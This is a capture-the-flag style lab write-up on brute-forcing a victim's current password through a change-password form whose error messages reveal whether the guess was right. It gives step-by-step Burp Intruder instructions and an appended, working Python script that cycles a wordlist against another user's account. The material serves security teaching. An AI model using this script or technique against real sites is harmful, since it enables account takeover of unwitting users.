“Password brute-force via password change” is a technique in which an attacker abuses the password change form to brute-force a user’s current password. The form asks for the current password before it will set a new one, and the server’s response to each submission reveals whether the candidate current password was right. The attacker works through a list of candidate passwords until the response confirms the correct one, then logs in to the account with it.
The vulnerability lies in the password change feature itself: it tells the attacker whether the supplied current password is correct, and it can be submitted on behalf of another user.
The steps to solve the lab are as follows:
The lab states that the “change password” functionality is vulnerable to a brute-force attack. To solve it we are given our own credentials, “wiener:peter”, the victim’s username, “carlos”, and a list of candidate passwords to use in the brute-force attack.
The first step is to log in to our account with our credentials so that we can analyze the features of the application.
I logged in to wiener’s account, which is my account, with those credentials. After logging in I was redirected to a page that lets me change my password. I kept Burp Suite’s proxy on so that the requests are stored in the history for analysis later.
Now I am changing the password of my own account. My current password was “peter”; I changed it to “peter1” and captured the request in Burp. At this point we are only analysing the feature. Our password was changed successfully.
Now we will test the password change feature further. First we will try changing our password again, this time entering a wrong current password such as “peter11” while entering the same value, “peter100”, in both the “new password” and “confirm password” boxes. Then we will check how the application responds.
What I observed was that the application logged us out. So we log in again, enter the correct current password, which is now “peter1”, and enter different values in the two “new password” fields.
I entered “peter1” as the current password and “peter12” and “peter23” as the two new passwords. This time the application returned an error message: “New passwords do not match.”
Finally, I entered incorrect details in all three boxes: “peter11” as the current password and “peter22” and “peter33” as the new passwords. The server returned a different error: “Current password is incorrect.”
So the application checks the current password first and only then compares the two new passwords. A request with the correct current password and two different new passwords returns “New passwords do not match” without changing anything, while a wrong current password with two different new passwords returns “Current password is incorrect” and does not log us out. That difference is our oracle for the brute-force attack.
Bruteforce time.
I took the request that contained my correct current password and two different new passwords and sent it to Burp Intruder.
First I changed the username parameter from “wiener” to “carlos”. Then I marked the current password parameter as the payload position, pasted the password list provided by the lab into the payload section, and went to the Options tab. The two new passwords are left different on purpose: a correct guess then produces “New passwords do not match” instead of actually changing carlos’s password, and a wrong guess does not log out our session.
In the Options tab, add “New passwords do not match” under Grep - Match, then start the attack.
After the attack finished, I sorted the results by the “New passwords do not match” column. The one request flagged there carried carlos’s password. I logged in as carlos with it and solved the lab. Follow me on Twitter @masaudsec.
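The same attack as a script, added here as a worked example rather than code from the original write-up or from the lab. It sends one change-password request per candidate, keeps the two new passwords different so that a correct guess cannot change the victim’s password, and uses the two error strings seen above as the oracle. The endpoint URL and the form field names are assumptions; check them against the captured request before running it against the lab. The simulated server at the bottom is constructed from the behaviour described in this write-up so the attack can be run offline.

```python
# Added example, not code from the original write-up: brute-force a victim's
# current password through a change-password form whose error text reveals
# whether the "current password" field was right. The endpoint and the form
# field names below are assumptions; the lab's real form may use others.
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Optional

ENDPOINT = "https://TARGET/my-account/change-password"  # assumed URL

# The two error strings observed in the write-up. They are the oracle.
MSG_MISMATCH = "New passwords do not match"    # current password was right
MSG_WRONG = "Current password is incorrect"     # current password was wrong

# Constructed sample wordlist standing in for the list the lab provides.
WORDLIST = ["123456", "password", "qwerty", "monkey", "letmein", "dragon"]


def build_form(username: str, candidate: str) -> Dict[str, str]:
    """Form body for one guess. The two new passwords are deliberately
    different, so a correct guess produces the mismatch error instead of
    actually changing the victim's password."""
    return {
        "username": username,              # assumed field name
        "current-password": candidate,     # assumed field name
        "new-password-1": "mismatch-A",    # assumed field name
        "new-password-2": "mismatch-B",    # assumed field name
    }


def classify(body: str) -> str:
    """Map a response body to 'hit', 'miss' or 'unknown' (e.g. logged out)."""
    if MSG_MISMATCH in body:
        return "hit"
    if MSG_WRONG in body:
        return "miss"
    return "unknown"


def brute_force(username: str, wordlist,
                send: Callable[[Dict[str, str]], str]) -> Optional[str]:
    """Try each candidate as the current password; return the first hit.

    Stops on an 'unknown' response: that usually means the session was
    invalidated (the write-up saw a logout), and every later guess would
    be judged against a login page rather than the change-password form.
    """
    for candidate in wordlist:
        verdict = classify(send(build_form(username, candidate)))
        if verdict == "hit":
            return candidate
        if verdict == "unknown":
            raise RuntimeError(f"unexpected response for {candidate!r}; session lost?")
    return None


def http_send(session_cookie: str) -> Callable[[Dict[str, str]], str]:
    """Real transport: POST the form using our own logged-in session cookie."""
    def send(form: Dict[str, str]) -> str:
        data = urllib.parse.urlencode(form).encode()
        req = urllib.request.Request(
            ENDPOINT, data=data, headers={"Cookie": f"session={session_cookie}"})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.read().decode(errors="replace")
        except urllib.error.HTTPError as exc:  # an error page is still the oracle
            return exc.read().decode(errors="replace")
    return send


def fake_target(real_password: str) -> Callable[[Dict[str, str]], str]:
    """Constructed stand-in for the lab server, reproducing the three
    behaviours observed in the write-up, so the attack can run offline."""
    def send(form: Dict[str, str]) -> str:
        if form["current-password"] != real_password:
            if form["new-password-1"] == form["new-password-2"]:
                return "<html><title>Login</title></html>"   # logged out
            return f'<p class="is-warning">{MSG_WRONG}</p>'
        if form["new-password-1"] != form["new-password-2"]:
            return f'<p class="is-warning">{MSG_MISMATCH}</p>'
        return "<p>Password changed</p>"
    return send


if __name__ == "__main__":
    # Offline demo against the simulated server; swap in
    # http_send("<your session cookie>") to run it against the lab.
    print(brute_force("carlos", WORDLIST, fake_target("monkey")))
```

The script stops as soon as a response matches neither error string, because that is what a logout looks like from the attacker’s side: every later guess would be evaluated against the login page and silently counted as a miss. Re-authenticate, grab the new session cookie, and resume from the failed candidate.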
To continue studying, check out the next lab, Broken brute-force protection, multiple credentials per request, but finish the current lab before moving on. Good luck!